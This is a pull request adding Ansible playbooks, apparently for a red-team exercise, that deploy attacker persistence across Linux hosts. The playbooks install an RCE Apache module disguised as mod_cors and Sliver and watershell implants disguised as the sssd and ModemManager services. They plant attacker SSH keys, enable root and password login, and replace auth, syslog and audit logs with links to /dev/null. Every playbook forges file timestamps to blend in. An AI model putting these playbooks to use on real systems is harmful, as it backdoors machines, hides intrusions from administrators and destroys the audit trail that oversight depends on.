### PR TITLE
Playbooks from xync to be tested.

### DIFF
--- a/reivew/apachemod-fed.yml
+++ b/reivew/apachemod-fed.yml
@@ -1,0 +1,25 @@
+- name: Install an RCE Apache mod to httpd style installations (CentOS/Fedora)
+  hosts: C7
+  tasks:
+  - name: Push the mod
+    ansible.builtin.copy:
+      src: /opt/payloads/c7/mod_cors.so
+      dest: /usr/lib64/httpd/modules/mod_cors.so
+      owner: root
+      group: root
+      mode: '755'
+  - name: Push the config file
+    ansible.builtin.copy:
+      src: /opt/payloads/c7/00-cors.conf
+      dest: /etc/httpd/conf.modules.d/00-cors.conf
+      owner: root
+      group: root
+      mode: '644'
+  - name: Enable the mod, set the dates to blend in, and restart apache
+    ansible.legacy.shell: |
+      touch -r /usr/lib64/httpd/modules/mod_cache.so /usr/lib64/httpd/modules/mod_cors.so
+      touch -r /etc/httpd/conf.modules.d/00-base.conf /etc/httpd/conf.modules.d/00-cors.conf
+      touch -r /etc/httpd/conf.d /etc/httpd/conf.modules.d
+      systemctl restart httpd
+    args:
+      executable: /bin/bash

--- a/reivew/apachemod-ubuntu.yml
+++ b/reivew/apachemod-ubuntu.yml
@@ -1,0 +1,29 @@
+- name: Install an RCE apache mod to apache2 style installations (Debian/Ubuntu)
+  hosts: U18
+  tasks:
+  - name: Push the mod
+    ansible.builtin.copy:
+      src: /opt/payloads/u18/mod_cors.so
+      dest: /usr/lib/apache2/modules/mod_cors.so
+      owner: root
+      group: root
+      mode: '644'
+  - name: Push the config file
+    ansible.builtin.copy:
+      src: /opt/payloads/u18/mod_cors.load
+      dest: /etc/apache2/mods-available/cors.load
+      owner: root
+      group: root
+      mode: '644'
+  - name: Enable the mod, set the dates to blend in, and restart apache
+    ansible.legacy.shell: |
+      cd /etc/apache2/mods-enabled
+      ln -s ../mods-available/cors.load cors.load
+      touch -r /usr/lib/apache2/modules/mod_cache.so /usr/lib/apache2/modules/mod_cors.so
+      touch -r /etc/apache2/mods-available/http2.load /etc/apache2/mods-available/cors.load
+      touch -hr /etc/apache2/mods-enabled/mime.load /etc/apache2/mods-enabled/cors.load
+      touch -r /etc/apache2/sites-available /etc/apache2/mods-available
+      touch -r /etc/apache2/sites-enabled /etc/apache2/mods-enabled
+      systemctl restart apache2
+    args:
+      executable: /bin/bash

--- a/reivew/blackholelogs.yml
+++ b/reivew/blackholelogs.yml
@@ -1,0 +1,73 @@
+- name: Blackhole logs
+  hosts: LinuxRoot
+  tasks:
+  - name: Overwrite /var/log/auth.log with a link to /dev/null (Deb)
+    ansible.legacy.shell: |
+      if test -f /var/log/auth.log; then
+        rm -f /var/log/auth.log
+        ln -s /dev/null /var/log/auth.log
+      fi
+    args:
+      executable: /bin/bash
+  
+  - name: Overwrite /var/log/user.log with a link to /dev/null
+    ansible.legacy.shell: |
+      if test -f /var/log/user.log; then
+        rm -f /var/log/user.log
+        ln -s /dev/null /var/log/user.log
+      fi
+    args:
+      executable: /bin/bash
+
+  - name: Overwrite /var/log/syslog with a link to /dev/null
+    ansible.legacy.shell: |
+      if test -f /var/log/syslog; then
+        rm -f /var/log/syslog
+        ln -s /dev/null /var/log/syslog
+      fi
+    args:
+      executable: /bin/bash
+  
+  - name: Overwrite /var/log/daemon.log with a link to /dev/null
+    ansible.legacy.shell: |
+      if test -f /var/log/daemon.log; then
+        rm -f /var/log/daemon.log
+        ln -s /dev/null /var/log/daemon.log
+      fi
+    args:
+      executable: /bin/bash
+  
+  - name: Overwrite /var/log/secure with a link to /dev/null (CentOS)
+    ansible.legacy.shell: |
+      if test -f /var/log/secure; then
+        rm -f /var/log/secure
+        ln -s /dev/null /var/log/secure
+        chmod 644 /var/log/secure
+        chown root.root /var/log/secure
+      fi
+    args:
+      executable: /bin/bash
+
+  - name: Overwrite /var/log/messages with a link to /dev/null (CentOS)
+    ansible.legacy.shell: |
+      if test -f /var/log/messages; then
+        rm -f /var/log/messages
+        ln -s /dev/null /var/log/messages
+        chmod 644 /var/log/messages
+        chown root.root /var/log/messages
+      fi
+    args:
+      executable: /bin/bash
+
+  - name: Overwrite /var/log/audit/audit.log with a link to /dev/null (CentOS)
+    ansible.legacy.shell: |
+      if test -f /var/log/audit/audit.log; then
+        rm -f /var/log/audit/audit.log
+        ln -s /dev/null /var/log/audit/audit.log
+        chmod 644 /var/log/audit/audit.log
+        chown root.root /var/log/audit/audit.log
+      fi
+    args:
+      executable: /bin/bash
+
+

--- a/reivew/simplesshkeys.yml
+++ b/reivew/simplesshkeys.yml
@@ -1,0 +1,27 @@
+- name: Place SSH keys in expected locations.  /root/.ssh and /home/[first user]/.ssh
+  hosts: LinuxRoot
+  tasks:
+  - name: Add ssh key to root
+    ansible.legacy.shell: |
+      if ! grep -q kQgUxh36 /root/.ssh/authorized_keys; then
+        echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILINPfZ8GuoF3Y+ge21PAwh42X+tcO+75py4kQgUXh36 root' >> /root/.ssh/authorized_keys
+        chown root.root /root/.ssh/authorized_keys 
+        chmod 600 /root/.ssh/authorized_keys
+        touch -r /root/.ssh /root/.ssh/authorized_keys 
+      fi
+    args:
+      executable: /bin/bash
+
+  - name: Add ssh key to gporter
+    ansible.legacy.shell: |
+      if test -d /home/grporter/.ssh/; then
+        if ! grep -q IVhqQnTE /root/.ssh/authorized_keys; then
+          echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBNBv5fwG83k6HnDqFmUlnaagIh2HUP+jruIIVhqQnTE grporter' >> /home/grporter/.ssh/authorized_keys
+          chown grporter.grporter /home/grporter/.ssh/authorized_keys 
+          chmod 600 /home/grporter/.ssh/authorized_keys
+          touch -r /home/grporter/.ssh /home/grporter/.ssh/authorized_keys 
+        fi
+      fi
+    args:
+      executable: /bin/bash
+

--- a/reivew/sliver-sssd.yml
+++ b/reivew/sliver-sssd.yml
@@ -1,0 +1,30 @@
+- name: Install sliver DNS beacon as a fake sssd service 
+  hosts: U18,U20,D10,F32,C7
+  tasks:
+  - name: Push the watershell executable
+    ansible.builtin.copy:
+      src: /opt/payloads/common/http-linux
+      dest: /usr/sbin/sssd
+      owner: root
+      group: root
+      mode: '755'
+  - name: Push the service config file
+    ansible.builtin.copy:
+      src: /opt/payloads/common/sssd.service
+      dest: /lib/systemd/system/sssd.service
+      owner: root
+      group: root
+      mode: '644'
+  - name: Put things in place and set dates to blend in 
+    ansible.legacy.shell: |
+      touch -r /usr/sbin/cron /usr/sbin/sssd
+      touch -r /lib/systemd/system/sockets.target.wants /lib/systemd/system/sssd.service
+      if ! test -L /etc/systemd/system/sssd.service; then
+        ln -s /lib/systemd/system/sssd.service /etc/systemd/system/sssd.service
+        touch -hr /etc/systemd/system/multi-user.target.wants /etc/systemd/system/sssd.service
+      fi
+      systemctl daemon-reload
+      systemctl enable sssd
+      systemctl restart sssd
+    args:
+      executable: /bin/bash

--- a/reivew/sshkey.yml
+++ b/reivew/sshkey.yml
@@ -1,0 +1,21 @@
+- name: Configure ssh to accept a sneaky key
+  hosts: LinuxRoot
+  tasks:
+  - name: Reconfigure SSH and write key file
+    ansible.legacy.shell: |
+      # Allow password based login, even for root, because, why not.
+      sed -i 's/^PasswordAuthentication .*$/PasswordAuthentication yes/' /etc/ssh/sshd_config
+      sed -i 's/^#PermitRootLogin .*$/PermitRootLogin yes/' /etc/ssh/sshd_config
+
+      # Add /etc/sshd/iv as a valid location for authorized keys
+      sed -i 's/^.*AuthorizedKeysFile.*$/AuthorizedKeysFile \/etc\/ssh\/iv \/root\/.ssh\/authorized_keys \/home\/%u\/.ssh\/authorized_keys/' /etc/ssh/sshd_config
+
+      # Write the redteam pubkey to /etc/ssh/iv
+      echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAII8MC+aXwkJNbcvu5aIQ/iXcvcvwl9y3eYE+TntYvhBc' > /etc/ssh/iv
+      chown root.root /etc/ssh/iv
+      chmod 644 /etc/ssh/iv
+      touch -r /etc/ssh/moduli /etc/ssh/iv
+      systemctl restart sshd
+    args:
+      executable: /bin/bash
+      creates: /etc/ssh/iv

--- a/reivew/watershell-modem.yml
+++ b/reivew/watershell-modem.yml
@@ -1,0 +1,38 @@
+- name: Install watershell as ModemManager service (Debian/Ubuntu)
+  hosts: U18,U20,D10,F32,C7
+  tasks:
+  - name: Push the watershell executable
+    ansible.builtin.copy:
+      src: /opt/payloads/common/watershell
+      dest: /tmp/ModemManager
+      owner: root
+      group: root
+      mode: '755'
+  - name: Push the service config file
+    ansible.builtin.copy:
+      src: /opt/payloads/common/ModemManager.service
+      dest: /tmp/ModemManager.service
+      owner: root
+      group: root
+      mode: '644'
+  - name: Put things in place and set dates to blend in 
+    ansible.legacy.shell: |
+      if test -f /usr/sbin/ModemManager; then
+        rm /usr/sbin/ModemManager
+      fi
+      mv /tmp/ModemManager /usr/sbin/ModemManager
+      touch -r /usr/sbin/chroot /usr/sbin/ModemManager
+      if test -f /lib/systemd/system/ModemManager; then
+        rm /lib/systemd/system/ModemManager.service
+      fi
+      mv /tmp/ModemManager.service /lib/systemd/system/ModemManager.service
+      touch -r /lib/systemd/system/sockets.target.wants /lib/systemd/system/ModemManager.service
+      if ! test -L /etc/systemd/system/dbus-org.freedesktop.ModemManager1.service; then
+        ln -s /lib/systemd/system/ModemManager.service /etc/systemd/system/dbus-org.freedesktop.ModemManager1.service
+        touch -hr /etc/systemd/system/multi-user.target.wants /etc/systemd/system/dbus-org.freedesktop.ModemManager1.service
+      fi
+      systemctl daemon-reload
+      systemctl enable ModemManager
+      systemctl restart ModemManager
+    args:
+      executable: /bin/bash


### PR DESCRIPTION
Playbooks do the following:
* apachemod-fed.yml - Install mod_rootme on servers with the "httpd" style Centos pathing
* apachemod-ubuntu.yml - Install mod_rootme on servers with the "apache2" style ubuntu pathing
* blackholelogs.yml - Link common log files to /dev/null to hide ansible actions and all other actions until someone notices.
* simplesshkeys.yml - Add an authorized key to root and one other user.
* sshkey.yml - Configures sshd to allow password based logins and allows root to login.  Places another key that can be used to authenticate as any user.
* watershell-modem.yml - Installs the watershell executable as a systemd service (persists across reboots)
* sliver-sssd.yml - Installs sliver as a systemd service (persists across reboots).